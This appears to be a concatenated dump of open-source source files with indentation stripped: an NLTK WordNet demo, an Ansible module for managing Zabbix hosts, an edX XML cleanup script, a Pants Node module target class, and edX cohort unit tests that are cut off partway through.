elif a.__class__ != b.__class__:
return cmp(a.__class__, b.__class__)
for field in fields:
diff = cmp(getattr(a, field), getattr(b, field))
if diff: return diff
return 0
def _equalsIgnoreCase(a, b):
"""
Return true iff a and b have the same lowercase representation.
>>> _equalsIgnoreCase('dog', 'Dog')
True
>>> _equalsIgnoreCase('dOg', 'DOG')
True
"""
return a == b or a.lower() == b.lower()
def demo():
from nltk import wordnet
from pprint import pprint
dog = wordnet.N['dog']
cat = wordnet.N['cat']
print "wordnet.N['dog']"
print 'dog' in wordnet.N
print dog
print dog.pos, dog.form
print dog.taggedSenseCount
print dog.synsets()
print dog.isTagged()
# ADJ['clear'].getAdjectivePositions()
# N['cat'] < N['dog']
# N['dog'] < V['dog']
print "Verb Frames:",
print wordnet.V['think'][0].verbFrameStrings
print "Relations:"
print dog[0].relations()
print dog[0][wordnet.HYPERNYM]
print "Glosses:"
print dog[0].gloss
print dog[0].relation(wordnet.HYPERNYM)[0].gloss
print
print "Paths and Distances:"
print
print dog[0].hypernym_paths()
print dog[0].hypernym_distances(0)
print dog[0].shortest_path_distance(cat[0])
print
print "Closures and Trees:"
print
pprint(wordnet.ADJ['red'][0].closure(wordnet.SIMILAR, depth=1))
pprint(wordnet.ADJ['red'][0].closure(wordnet.SIMILAR, depth=2))
pprint(dog[0].tree(wordnet.HYPERNYM))
pprint(dog[0].tree(wordnet.HYPERNYM, depth=2, cut_mark = '...'))
entity = wordnet.N["entity"]
print entity, entity[0]
print entity[0][wordnet.HYPONYM]
pprint(entity[0].tree(wordnet.HYPONYM, depth=1), indent=4)
abstract_entity = wordnet.N["abstract entity"]
print abstract_entity, abstract_entity[0]
print abstract_entity[0][wordnet.HYPONYM]
pprint(abstract_entity[0].tree(wordnet.HYPONYM, depth=1), indent=4)
# Adjectives that are transitively SIMILAR to any of the senses of 'red'
#flatten1(map(lambda sense:closure(sense, SIMILAR), ADJ['red'])) # too verbose
print "All the words in the hyponym synsets of dog[0]"
print [word for synset in dog[0][wordnet.HYPONYM] for word in synset]
print "Hyponyms of the first (and only) sense of 'animal' that are homophonous with verbs:"
print [word for synset in wordnet.N['animal'][0].closure(wordnet.HYPONYM) for word in synset if word in V]
# BROKEN
print "Senses of 'raise'(v.) and 'lower'(v.) that are antonyms:"
print filter(lambda p:p[0] in p[1][wordnet.ANTONYM], [(r,l) for r in wordnet.V['raise'] for l in wordnet.V['lower']])
print
print "Similarity: dog~cat"
print
print "Path Distance Similarity:",
print dog[0].path_similarity(cat[0])
print "Leacock Chodorow Similarity:",
print dog[0].lch_similarity(cat[0])
print "Wu Palmer Similarity:",
print dog[0].wup_similarity(cat[0])
# set up the data file
# print "Resnik Similarity:",
# print dog[0].resnik_similarity(cat[0], datafile)
# print "Jiang-Conrath Similarity:",
# print dog[0].jiang_conrath_similarity(cat[0], datafile)
# print "Lin Similarity:",
# print dog[0].lin_similarity(cat[0], datafile)
if __name__ == '__main__':
demo()
| gpl-3.0 |
ptemplier/ansible | lib/ansible/modules/monitoring/zabbix_host.py | 11 | 22176 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013-2014, Epic Games, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: zabbix_host
short_description: Zabbix host creates/updates/deletes
description:
- This module allows you to create, modify and delete Zabbix host entries and associated group and template data.
version_added: "2.0"
author:
- "(@cove)"
- "Tony Minfei Ding"
- "Harrison Gu (@harrisongu)"
requirements:
- "python >= 2.6"
- zabbix-api
options:
server_url:
description:
- Url of Zabbix server, with protocol (http or https).
required: true
aliases: [ "url" ]
login_user:
description:
- Zabbix user name, used to authenticate against the server.
required: true
login_password:
description:
- Zabbix user password.
required: true
http_login_user:
description:
- Basic Auth login
required: false
default: None
version_added: "2.1"
http_login_password:
description:
- Basic Auth password
required: false
default: None
version_added: "2.1"
host_name:
description:
- Name of the host in Zabbix.
- host_name is the unique identifier used and cannot be updated using this module.
required: true
visible_name:
description:
- Visible name of the host in Zabbix.
required: false
version_added: '2.3'
host_groups:
description:
- List of host groups the host is part of.
required: false
link_templates:
description:
- List of templates linked to the host.
required: false
default: None
inventory_mode:
description:
- Configure the inventory mode.
choices: ['automatic', 'manual', 'disabled']
required: false
default: None
version_added: '2.1'
status:
description:
- Monitoring status of the host.
required: false
choices: ['enabled', 'disabled']
default: "enabled"
state:
description:
- State of the host.
- On C(present), it will create if host does not exist or update the host if the associated data is different.
- On C(absent) will remove a host if it exists.
required: false
choices: ['present', 'absent']
default: "present"
timeout:
description:
- The timeout of API request (seconds).
default: 10
proxy:
description:
- The name of the Zabbix Proxy to be used
default: None
interfaces:
description:
- List of interfaces to be created for the host (see example below).
- 'Available values are: dns, ip, main, port, type and useip.'
- Please review the interface documentation for more information on the supported properties
- 'https://www.zabbix.com/documentation/2.0/manual/appendix/api/hostinterface/definitions#host_interface'
required: false
default: []
force:
description:
- Overwrite the host configuration, even if already present
required: false
default: "yes"
choices: [ "yes", "no" ]
version_added: "2.0"
'''
EXAMPLES = '''
- name: Create a new host or update an existing host's info
local_action:
module: zabbix_host
server_url: http://monitor.example.com
login_user: username
login_password: password
host_name: ExampleHost
visible_name: ExampleName
host_groups:
- Example group1
- Example group2
link_templates:
- Example template1
- Example template2
status: enabled
state: present
inventory_mode: automatic
interfaces:
- type: 1
main: 1
useip: 1
ip: 10.xx.xx.xx
dns: ""
port: 10050
- type: 4
main: 1
useip: 1
ip: 10.xx.xx.xx
dns: ""
port: 12345
proxy: a.zabbix.proxy
'''
import copy
try:
from zabbix_api import ZabbixAPI, ZabbixAPISubClass
# Extend the ZabbixAPI
# Since the zabbix-api python module too old (version 1.0, no higher version so far),
# it does not support the 'hostinterface' api calls,
# so we have to inherit the ZabbixAPI class to add 'hostinterface' support.
class ZabbixAPIExtends(ZabbixAPI):
hostinterface = None
def __init__(self, server, timeout, user, passwd, **kwargs):
ZabbixAPI.__init__(self, server, timeout=timeout, user=user, passwd=passwd)
self.hostinterface = ZabbixAPISubClass(self, dict({"prefix": "hostinterface"}, **kwargs))
HAS_ZABBIX_API = True
except ImportError:
HAS_ZABBIX_API = False
from ansible.module_utils.basic import AnsibleModule
class Host(object):
def __init__(self, module, zbx):
self._module = module
self._zapi = zbx
# exist host
def is_host_exist(self, host_name):
result = self._zapi.host.get({'filter': {'host': host_name}})
return result
# check if host group exists
def check_host_group_exist(self, group_names):
for group_name in group_names:
result = self._zapi.hostgroup.get({'filter': {'name': group_name}})
if not result:
self._module.fail_json(msg="Hostgroup not found: %s" % group_name)
return True
def get_template_ids(self, template_list):
template_ids = []
if template_list is None or len(template_list) == 0:
return template_ids
for template in template_list:
template_list = self._zapi.template.get({'output': 'extend', 'filter': {'host': template}})
if len(template_list) < 1:
self._module.fail_json(msg="Template not found: %s" % template)
else:
template_id = template_list[0]['templateid']
template_ids.append(template_id)
return template_ids
def add_host(self, host_name, group_ids, status, interfaces, proxy_id, visible_name):
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
parameters = {'host': host_name, 'interfaces': interfaces, 'groups': group_ids, 'status': status}
if proxy_id:
parameters['proxy_hostid'] = proxy_id
if visible_name:
parameters['name'] = visible_name
host_list = self._zapi.host.create(parameters)
if len(host_list) >= 1:
return host_list['hostids'][0]
except Exception as e:
self._module.fail_json(msg="Failed to create host %s: %s" % (host_name, e))
def update_host(self, host_name, group_ids, status, host_id, interfaces, exist_interface_list, proxy_id, visible_name):
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
parameters = {'hostid': host_id, 'groups': group_ids, 'status': status}
if proxy_id:
parameters['proxy_hostid'] = proxy_id
if visible_name:
parameters['name'] = visible_name
self._zapi.host.update(parameters)
interface_list_copy = exist_interface_list
if interfaces:
for interface in interfaces:
flag = False
interface_str = interface
for exist_interface in exist_interface_list:
interface_type = interface['type']
exist_interface_type = int(exist_interface['type'])
if interface_type == exist_interface_type:
# update
interface_str['interfaceid'] = exist_interface['interfaceid']
self._zapi.hostinterface.update(interface_str)
flag = True
interface_list_copy.remove(exist_interface)
break
if not flag:
# add
interface_str['hostid'] = host_id
self._zapi.hostinterface.create(interface_str)
# remove
remove_interface_ids = []
for remove_interface in interface_list_copy:
interface_id = remove_interface['interfaceid']
remove_interface_ids.append(interface_id)
if len(remove_interface_ids) > 0:
self._zapi.hostinterface.delete(remove_interface_ids)
except Exception as e:
self._module.fail_json(msg="Failed to update host %s: %s" % (host_name, e))
def delete_host(self, host_id, host_name):
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
self._zapi.host.delete([host_id])
except Exception as e:
self._module.fail_json(msg="Failed to delete host %s: %s" % (host_name, e))
# get host by host name
def get_host_by_host_name(self, host_name):
host_list = self._zapi.host.get({'output': 'extend', 'filter': {'host': [host_name]}})
if len(host_list) < 1:
self._module.fail_json(msg="Host not found: %s" % host_name)
else:
return host_list[0]
# get proxyid by proxy name
def get_proxyid_by_proxy_name(self, proxy_name):
proxy_list = self._zapi.proxy.get({'output': 'extend', 'filter': {'host': [proxy_name]}})
if len(proxy_list) < 1:
self._module.fail_json(msg="Proxy not found: %s" % proxy_name)
else:
return proxy_list[0]['proxyid']
# get group ids by group names
def get_group_ids_by_group_names(self, group_names):
group_ids = []
if self.check_host_group_exist(group_names):
group_list = self._zapi.hostgroup.get({'output': 'extend', 'filter': {'name': group_names}})
for group in group_list:
group_id = group['groupid']
group_ids.append({'groupid': group_id})
return group_ids
# get host templates by host id
def get_host_templates_by_host_id(self, host_id):
template_ids = []
template_list = self._zapi.template.get({'output': 'extend', 'hostids': host_id})
for template in template_list:
template_ids.append(template['templateid'])
return template_ids
# get host groups by host id
def get_host_groups_by_host_id(self, host_id):
exist_host_groups = []
host_groups_list = self._zapi.hostgroup.get({'output': 'extend', 'hostids': host_id})
if len(host_groups_list) >= 1:
for host_groups_name in host_groups_list:
exist_host_groups.append(host_groups_name['name'])
return exist_host_groups
# check the exist_interfaces whether it equals the interfaces or not
def check_interface_properties(self, exist_interface_list, interfaces):
interfaces_port_list = []
if interfaces is not None:
if len(interfaces) >= 1:
for interface in interfaces:
interfaces_port_list.append(int(interface['port']))
exist_interface_ports = []
if len(exist_interface_list) >= 1:
for exist_interface in exist_interface_list:
exist_interface_ports.append(int(exist_interface['port']))
if set(interfaces_port_list) != set(exist_interface_ports):
return True
for exist_interface in exist_interface_list:
exit_interface_port = int(exist_interface['port'])
for interface in interfaces:
interface_port = int(interface['port'])
if interface_port == exit_interface_port:
for key in interface.keys():
if str(exist_interface[key]) != str(interface[key]):
return True
return False
# get the status of host by host
def get_host_status_by_host(self, host):
return host['status']
# check all the properties before link or clear template
def check_all_properties(self, host_id, host_groups, status, interfaces, template_ids,
exist_interfaces, host, proxy_id, visible_name):
# get the existing host's groups
exist_host_groups = self.get_host_groups_by_host_id(host_id)
if set(host_groups) != set(exist_host_groups):
return True
# get the existing status
exist_status = self.get_host_status_by_host(host)
if int(status) != int(exist_status):
return True
# check the exist_interfaces whether it equals the interfaces or not
if self.check_interface_properties(exist_interfaces, interfaces):
return True
# get the existing templates
exist_template_ids = self.get_host_templates_by_host_id(host_id)
if set(list(template_ids)) != set(exist_template_ids):
return True
if host['proxy_hostid'] != proxy_id:
return True
if host['name'] != visible_name:
return True
return False
# link or clear template of the host
def link_or_clear_template(self, host_id, template_id_list):
# get host's exist template ids
exist_template_id_list = self.get_host_templates_by_host_id(host_id)
exist_template_ids = set(exist_template_id_list)
template_ids = set(template_id_list)
template_id_list = list(template_ids)
# get unlink and clear templates
templates_clear = exist_template_ids.difference(template_ids)
templates_clear_list = list(templates_clear)
request_str = {'hostid': host_id, 'templates': template_id_list, 'templates_clear': templates_clear_list}
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
self._zapi.host.update(request_str)
except Exception as e:
self._module.fail_json(msg="Failed to link template to host: %s" % e)
# Update the host inventory_mode
def update_inventory_mode(self, host_id, inventory_mode):
# nothing was set, do nothing
if not inventory_mode:
return
if inventory_mode == "automatic":
inventory_mode = int(1)
elif inventory_mode == "manual":
inventory_mode = int(0)
elif inventory_mode == "disabled":
inventory_mode = int(-1)
# watch for - https://support.zabbix.com/browse/ZBX-6033
request_str = {'hostid': host_id, 'inventory_mode': inventory_mode}
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
self._zapi.host.update(request_str)
except Exception as e:
self._module.fail_json(msg="Failed to set inventory_mode to host: %s" % e)
def main():
module = AnsibleModule(
argument_spec=dict(
server_url=dict(type='str', required=True, aliases=['url']),
login_user=dict(type='str', required=True),
login_password=dict(type='str', required=True, no_log=True),
host_name=dict(type='str', required=True),
http_login_user=dict(type='str', required=False, default=None),
http_login_password=dict(type='str', required=False, default=None, no_log=True),
host_groups=dict(type='list', required=False),
link_templates=dict(type='list', required=False),
status=dict(default="enabled", choices=['enabled', 'disabled']),
state=dict(default="present", choices=['present', 'absent']),
inventory_mode=dict(required=False, choices=['automatic', 'manual', 'disabled']),
timeout=dict(type='int', default=10),
interfaces=dict(type='list', required=False),
force=dict(type='bool', default=True),
proxy=dict(type='str', required=False),
visible_name=dict(type='str', required=False)
),
supports_check_mode=True
)
if not HAS_ZABBIX_API:
module.fail_json(msg="Missing required zabbix-api module (check docs or install with: pip install zabbix-api)")
server_url = module.params['server_url']
login_user = module.params['login_user']
login_password = module.params['login_password']
http_login_user = module.params['http_login_user']
http_login_password = module.params['http_login_password']
host_name = module.params['host_name']
visible_name = module.params['visible_name']
host_groups = module.params['host_groups']
link_templates = module.params['link_templates']
inventory_mode = module.params['inventory_mode']
status = module.params['status']
state = module.params['state']
timeout = module.params['timeout']
interfaces = module.params['interfaces']
force = module.params['force']
proxy = module.params['proxy']
# convert enabled to 0; disabled to 1
status = 1 if status == "disabled" else 0
zbx = None
# login to zabbix
try:
zbx = ZabbixAPIExtends(server_url, timeout=timeout, user=http_login_user, passwd=http_login_password)
zbx.login(login_user, login_password)
except Exception as e:
module.fail_json(msg="Failed to connect to Zabbix server: %s" % e)
host = Host(module, zbx)
template_ids = []
if link_templates:
template_ids = host.get_template_ids(link_templates)
group_ids = []
if host_groups:
group_ids = host.get_group_ids_by_group_names(host_groups)
ip = ""
if interfaces:
for interface in interfaces:
if interface['type'] == 1:
ip = interface['ip']
# check if host exist
is_host_exist = host.is_host_exist(host_name)
if is_host_exist:
# Use proxy specified, or set to None when updating host
if proxy:
proxy_id = host.get_proxyid_by_proxy_name(proxy)
else:
proxy_id = None
# get host id by host name
zabbix_host_obj = host.get_host_by_host_name(host_name)
host_id = zabbix_host_obj['hostid']
if state == "absent":
# remove host
host.delete_host(host_id, host_name)
module.exit_json(changed=True, result="Successfully delete host %s" % host_name)
else:
if not group_ids:
module.fail_json(msg="Specify at least one group for updating host '%s'." % host_name)
if not force:
module.fail_json(changed=False, result="Host present, Can't update configuration without force")
# get exist host's interfaces
exist_interfaces = host._zapi.hostinterface.get({'output': 'extend', 'hostids': host_id})
exist_interfaces_copy = copy.deepcopy(exist_interfaces)
# update host
interfaces_len = len(interfaces) if interfaces else 0
if len(exist_interfaces) > interfaces_len:
if host.check_all_properties(host_id, host_groups, status, interfaces, template_ids,
exist_interfaces, zabbix_host_obj, proxy_id, visible_name):
host.link_or_clear_template(host_id, template_ids)
host.update_host(host_name, group_ids, status, host_id,
interfaces, exist_interfaces, proxy_id, visible_name)
module.exit_json(changed=True,
result="Successfully update host %s (%s) and linked with template '%s'"
% (host_name, ip, link_templates))
else:
module.exit_json(changed=False)
else:
if host.check_all_properties(host_id, host_groups, status, interfaces, template_ids,
exist_interfaces_copy, zabbix_host_obj, proxy_id, visible_name):
host.update_host(host_name, group_ids, status, host_id, interfaces, exist_interfaces, proxy_id, visible_name)
host.link_or_clear_template(host_id, template_ids)
host.update_inventory_mode(host_id, inventory_mode)
module.exit_json(changed=True,
result="Successfully update host %s (%s) and linked with template '%s'"
% (host_name, ip, link_templates))
else:
module.exit_json(changed=False)
else:
if state == "absent":
# the host is already deleted.
module.exit_json(changed=False)
# Use proxy specified, or set to 0 when adding new host
if proxy:
proxy_id = host.get_proxyid_by_proxy_name(proxy)
else:
proxy_id = 0
if not group_ids:
module.fail_json(msg="Specify at least one group for creating host '%s'." % host_name)
if not interfaces or (interfaces and len(interfaces) == 0):
module.fail_json(msg="Specify at least one interface for creating host '%s'." % host_name)
# create host
host_id = host.add_host(host_name, group_ids, status, interfaces, proxy_id, visible_name)
host.link_or_clear_template(host_id, template_ids)
host.update_inventory_mode(host_id, inventory_mode)
module.exit_json(changed=True, result="Successfully added host %s (%s) and linked with template '%s'" % (
host_name, ip, link_templates))
if __name__ == '__main__':
main()
| gpl-3.0 |
nanolearning/edx-platform | common/xml_cleanup.py | 67 | 3431 | #!/usr/bin/env python
"""
Victor's xml cleanup script. A big pile of useful hacks. Do not use
without carefully reading the code and deciding that this is what you want.
In particular, the remove-meta option is only intended to be used after pulling out a policy
using the metadata_to_json management command.
"""
import os
import fnmatch
import re
import sys
from lxml import etree
from collections import defaultdict
INVALID_CHARS = re.compile(r"[^\w.-]")
def clean(value):
"""
Return value, made into a form legal for locations
"""
return re.sub('_+', '_', INVALID_CHARS.sub('_', value))
# category -> set of url_names for that category that we've already seen
used_names = defaultdict(set)
def clean_unique(category, name):
cleaned = clean(name)
if cleaned not in used_names[category]:
used_names[category].add(cleaned)
return cleaned
x = 1
while cleaned + str(x) in used_names[category]:
x += 1
# Found one!
cleaned = cleaned + str(x)
used_names[category].add(cleaned)
return cleaned
def cleanup(filepath, remove_meta):
# Keys that are exported to the policy file, and so
# can be removed from the xml afterward
to_remove = ('format', 'display_name',
'graceperiod', 'showanswer', 'rerandomize',
'start', 'due', 'graded', 'hide_from_toc',
'ispublic', 'xqa_key')
try:
print "Cleaning {0}".format(filepath)
with open(filepath) as f:
parser = etree.XMLParser(remove_comments=False)
xml = etree.parse(filepath, parser=parser)
except:
print "Error parsing file {0}".format(filepath)
return
for node in xml.iter(tag=etree.Element):
attrs = node.attrib
if 'url_name' in attrs:
used_names[node.tag].add(attrs['url_name'])
if 'name' in attrs:
# Replace name with an identical display_name, and a unique url_name
name = attrs['name']
attrs['display_name'] = name
attrs['url_name'] = clean_unique(node.tag, name)
del attrs['name']
if 'url_name' in attrs and 'slug' in attrs:
print "WARNING: {0} has both slug and url_name".format(node)
if ('url_name' in attrs and 'filename' in attrs and
len(attrs) == 2 and attrs['url_name'] == attrs['filename']):
# This is a pointer tag in disguise. Get rid of the filename.
print 'turning {0}.{1} into a pointer tag'.format(node.tag, attrs['url_name'])
del attrs['filename']
if remove_meta:
for attr in to_remove:
if attr in attrs:
del attrs[attr]
with open(filepath, "w") as f:
f.write(etree.tostring(xml))
def find_replace(directory, filePattern, remove_meta):
for path, dirs, files in os.walk(os.path.abspath(directory)):
for filename in fnmatch.filter(files, filePattern):
filepath = os.path.join(path, filename)
cleanup(filepath, remove_meta)
def main(args):
usage = "xml_cleanup [dir] [remove-meta]"
n = len(args)
if n < 1 or n > 2 or (n == 2 and args[1] != 'remove-meta'):
print usage
return
remove_meta = False
if n == 2:
remove_meta = True
find_replace(args[0], '*.xml', remove_meta)
if __name__ == '__main__':
main(sys.argv[1:])
| agpl-3.0 |
kwlzn/pants | contrib/node/src/python/pants/contrib/node/targets/node_preinstalled_module.py | 18 | 1883 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.base.payload import Payload
from pants.base.payload_field import PrimitiveField
from pants.contrib.node.targets.node_module import NodeModule
class NodePreinstalledModule(NodeModule):
"""A NodeModule which resolves deps by downloading an archived node_modules directory.
This is basically an example, to demonstrate how additional types of NodeModule targets with
their own resolvers (in this case NodePreinstalledModuleResolver), which still work with
NodeTest, can be registered. To be generallly correct, this target type and associated resolver
would have to use platform- and Node-version-specific node_modules archives, rather than just
a single dependencies_archive_url used verbatim. Consider NodePreinstalledModule and
NodePreinstalledModuleResolver subject to future change or removal for now.
"""
def __init__(self, dependencies_archive_url=None, sources=None,
address=None, payload=None, **kwargs):
"""
:param string url: The location of a tar.gz file containing containing a node_modules directory.
"""
payload = payload or Payload()
payload.add_fields({
'dependencies_archive_url': PrimitiveField(dependencies_archive_url),
})
super(NodePreinstalledModule, self).__init__(sources=sources, address=address,
payload=payload, **kwargs)
@property
def dependencies_archive_url(self):
"""Where to download the archive containing the node_modules directory.
:rtype: string
"""
return self.payload.dependencies_archive_url
| apache-2.0 |
mbareta/edx-platform-ft | openedx/core/djangoapps/course_groups/tests/test_cohorts.py | 11 | 33670 | """
Tests for cohorts
"""
# pylint: disable=no-member
import ddt
from mock import call, patch
from nose.plugins.attrib import attr
import before_after
from django.contrib.auth.models import User
from django.db import IntegrityError
from django.http import Http404
from django.test import TestCase
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from student.models import CourseEnrollment
from student.tests.factories import UserFactory
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import TEST_DATA_MIXED_MODULESTORE, ModuleStoreTestCase
from xmodule.modulestore.tests.factories import ToyCourseFactory
from ..models import CourseUserGroup, CourseCohort, CourseUserGroupPartitionGroup
from .. import cohorts
from ..tests.helpers import (
topic_name_to_id, config_course_cohorts, config_course_cohorts_legacy,
CohortFactory, CourseCohortFactory, CourseCohortSettingsFactory
)
@attr('shard_2')
@patch("openedx.core.djangoapps.course_groups.cohorts.tracker", autospec=True)
class TestCohortSignals(TestCase):
"""
Test cases to validate event emissions for various cohort-related workflows
"""
def setUp(self):
super(TestCohortSignals, self).setUp()
self.course_key = SlashSeparatedCourseKey("dummy", "dummy", "dummy")
def test_cohort_added(self, mock_tracker):
# Add cohort
cohort = CourseUserGroup.objects.create(
name="TestCohort",
course_id=self.course_key,
group_type=CourseUserGroup.COHORT
)
mock_tracker.emit.assert_called_with(
"edx.cohort.created",
{"cohort_id": cohort.id, "cohort_name": cohort.name}
)
mock_tracker.reset_mock()
# Modify existing cohort
cohort.name = "NewName"
cohort.save()
self.assertFalse(mock_tracker.called)
# Add non-cohort group
CourseUserGroup.objects.create(
name="TestOtherGroupType",
course_id=self.course_key,
group_type="dummy"
)
self.assertFalse(mock_tracker.called)
def test_cohort_membership_changed(self, mock_tracker):
cohort_list = [CohortFactory() for _ in range(2)]
non_cohort = CourseUserGroup.objects.create(
name="dummy",
course_id=self.course_key,
group_type="dummy"
)
user_list = [UserFactory() for _ in range(2)]
mock_tracker.reset_mock()
def assert_events(event_name_suffix, user_list, cohort_list):
"""
Confirms the presence of the specifed event for each user in the specified list of cohorts
"""
mock_tracker.emit.assert_has_calls([
call(
"edx.cohort.user_" + event_name_suffix,
{
"user_id": user.id,
"cohort_id": cohort.id,
"cohort_name": cohort.name,
}
)
for user in user_list for cohort in cohort_list
])
# Add users to cohort
cohort_list[0].users.add(*user_list)
assert_events("added", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Remove users from cohort
cohort_list[0].users.remove(*user_list)
assert_events("removed", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Clear users from cohort
cohort_list[0].users.add(*user_list)
cohort_list[0].users.clear()
assert_events("removed", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Clear users from non-cohort group
non_cohort.users.add(*user_list)
non_cohort.users.clear()
self.assertFalse(mock_tracker.emit.called)
# Add cohorts to user
user_list[0].course_groups.add(*cohort_list)
assert_events("added", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Remove cohorts from user
user_list[0].course_groups.remove(*cohort_list)
assert_events("removed", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Clear cohorts from user
user_list[0].course_groups.add(*cohort_list)
user_list[0].course_groups.clear()
assert_events("removed", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Clear non-cohort groups from user
user_list[0].course_groups.add(non_cohort)
user_list[0].course_groups.clear()
self.assertFalse(mock_tracker.emit.called)
@attr('shard_2')
@ddt.ddt
class TestCohorts(ModuleStoreTestCase):
"""
Test the cohorts feature
"""
MODULESTORE = TEST_DATA_MIXED_MODULESTORE
def setUp(self):
"""
Make sure that course is reloaded every time--clear out the modulestore.
"""
super(TestCohorts, self).setUp()
self.toy_course_key = ToyCourseFactory.create().id
def _create_cohort(self, course_id, cohort_name, assignment_type):
"""
Create a cohort for testing.
"""
cohort = CohortFactory(course_id=course_id, name=cohort_name)
CourseCohortFactory(course_user_group=cohort, assignment_type=assignment_type)
return cohort
def test_is_course_cohorted(self):
"""
Make sure cohorts.is_course_cohorted() correctly reports if a course is cohorted or not.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(cohorts.is_course_cohorted(course.id))
config_course_cohorts(course, is_cohorted=True)
self.assertTrue(cohorts.is_course_cohorted(course.id))
# Make sure we get a Http404 if there's no course
fake_key = SlashSeparatedCourseKey('a', 'b', 'c')
self.assertRaises(Http404, lambda: cohorts.is_course_cohorted(fake_key))
def test_get_cohort_id(self):
"""
Make sure that cohorts.get_cohort_id() correctly returns the cohort id, or raises a ValueError when given an
invalid course key.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(cohorts.is_course_cohorted(course.id))
user = UserFactory(username="test", email="a@b.com")
self.assertIsNone(cohorts.get_cohort_id(user, course.id))
config_course_cohorts(course, is_cohorted=True)
cohort = CohortFactory(course_id=course.id, name="TestCohort", users=[user])
self.assertEqual(cohorts.get_cohort_id(user, course.id), cohort.id)
self.assertRaises(
Http404,
lambda: cohorts.get_cohort_id(user, SlashSeparatedCourseKey("course", "does_not", "exist"))
)
def test_assignment_type(self):
"""
Make sure that cohorts.set_assignment_type() and cohorts.get_assignment_type() works correctly.
"""
course = modulestore().get_course(self.toy_course_key)
# We are creating two random cohorts because we can't change assignment type of
# random cohort if it is the only random cohort present.
cohort1 = self._create_cohort(course.id, "TestCohort1", CourseCohort.RANDOM)
self._create_cohort(course.id, "TestCohort2", CourseCohort.RANDOM)
cohort3 = self._create_cohort(course.id, "TestCohort3", CourseCohort.MANUAL)
self.assertEqual(cohorts.get_assignment_type(cohort1), CourseCohort.RANDOM)
cohorts.set_assignment_type(cohort1, CourseCohort.MANUAL)
self.assertEqual(cohorts.get_assignment_type(cohort1), CourseCohort.MANUAL)
cohorts.set_assignment_type(cohort3, CourseCohort.RANDOM)
self.assertEqual(cohorts.get_assignment_type(cohort3), CourseCohort.RANDOM)
def test_cannot_set_assignment_type(self):
"""
Make sure that we can't change the assignment type of a random cohort if it is the only random cohort present.
"""
course = modulestore().get_course(self.toy_course_key)
cohort = self._create_cohort(course.id, "TestCohort", CourseCohort.RANDOM)
self.assertEqual(cohorts.get_assignment_type(cohort), CourseCohort.RANDOM)
exception_msg = "There must be one cohort to which students can automatically be assigned."
with self.assertRaises(ValueError) as context_manager:
cohorts.set_assignment_type(cohort, CourseCohort.MANUAL)
self.assertEqual(exception_msg, str(context_manager.exception))
def test_get_cohort(self):
"""
Make sure cohorts.get_cohort() does the right thing when the course is cohorted
"""
course = modulestore().get_course(self.toy_course_key)
self.assertEqual(course.id, self.toy_course_key)
self.assertFalse(cohorts.is_course_cohorted(course.id))
user = UserFactory(username="test", email="a@b.com")
other_user = UserFactory(username="test2", email="a2@b.com")
self.assertIsNone(cohorts.get_cohort(user, course.id), "No cohort created yet")
cohort = CohortFactory(course_id=course.id, name="TestCohort", users=[user])
self.assertIsNone(
cohorts.get_cohort(user, course.id),
"Course isn't cohorted, so shouldn't have a cohort"
)
# Make the course cohorted...
config_course_cohorts(course, is_cohorted=True)
self.assertEquals(
cohorts.get_cohort(user, course.id).id,
cohort.id,
"user should be assigned to the correct cohort"
)
self.assertEquals(
cohorts.get_cohort(other_user, course.id).id,
cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).id,
"other_user should be assigned to the default cohort"
)
@ddt.data(
(True, 3),
(False, 9),
)
@ddt.unpack
def test_get_cohort_sql_queries(self, use_cached, num_sql_queries):
"""
Test number of queries by cohorts.get_cohort() with and without caching.
"""
course = modulestore().get_course(self.toy_course_key)
config_course_cohorts(course, is_cohorted=True)
user = UserFactory(username="test", email="a@b.com")
CohortFactory.create(course_id=course.id, name="TestCohort", users=[user])
with self.assertNumQueries(num_sql_queries):
for __ in range(3):
cohorts.get_cohort(user, course.id, use_cached=use_cached)
def test_get_cohort_with_assign(self):
"""
Make sure cohorts.get_cohort() returns None if no group is already
assigned to a user instead of assigning/creating a group automatically
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(cohorts.is_course_cohorted(course.id))
user = UserFactory(username="test", email="a@b.com")
# Add an auto_cohort_group to the course...
config_course_cohorts(
course,
is_cohorted=True,
auto_cohorts=["AutoGroup"]
)
# get_cohort should return None as no group is assigned to user
self.assertIsNone(cohorts.get_cohort(user, course.id, assign=False))
# get_cohort should return a group for user
self.assertEquals(cohorts.get_cohort(user, course.id).name, "AutoGroup")
def test_cohorting_with_auto_cohorts(self):
"""
Make sure cohorts.get_cohort() does the right thing.
If there are auto cohort groups then a user should be assigned one.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(cohorts.is_course_cohorted(course.id))
user1 = UserFactory(username="test", email="a@b.com")
user2 = UserFactory(username="test2", email="a2@b.com")
cohort = CohortFactory(course_id=course.id, name="TestCohort", users=[user1])
# Add an auto_cohort_group to the course...
config_course_cohorts(
course,
is_cohorted=True,
auto_cohorts=["AutoGroup"]
)
self.assertEquals(cohorts.get_cohort(user1, course.id).id, cohort.id, "user1 should stay put")
